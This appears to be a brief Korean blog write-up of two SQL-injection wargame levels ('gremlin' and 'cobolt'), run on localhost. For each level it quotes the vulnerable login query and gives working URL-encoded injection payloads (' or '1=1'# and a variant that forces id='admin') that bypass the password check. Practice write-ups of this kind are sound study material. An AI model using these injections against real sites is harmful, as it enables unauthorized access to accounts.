뉴비에욤

필터링은 무시하고, 클리어 조건을 보면 쿼리에 대한 결과 값 중 id 값이 'admin' 이여야만 한다. 다행히 'pw'는 체크하지 않기 때문에 간단하게 클리어 할 수 있다. http://localhost/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=1%27%20or%20%271=1%27%20and%20id=%27admin%27%23

가장 기본적인 필터링이 적용된 문제이다. "select id from prob_gremlin where id='{$_GET[id]}' and pw='{$_GET[pw]}'"; 쿼리에 대한 실행 결과가 있기만 하면 클리어 되는 문제이기 때문에 가장 기본적인 id=1' or '1=1'"# 을 입력한다. http://localhost/gremlin_280c5552de8b681110e9287421b834fd.php?id=1%27%20or%20%271=1%27%23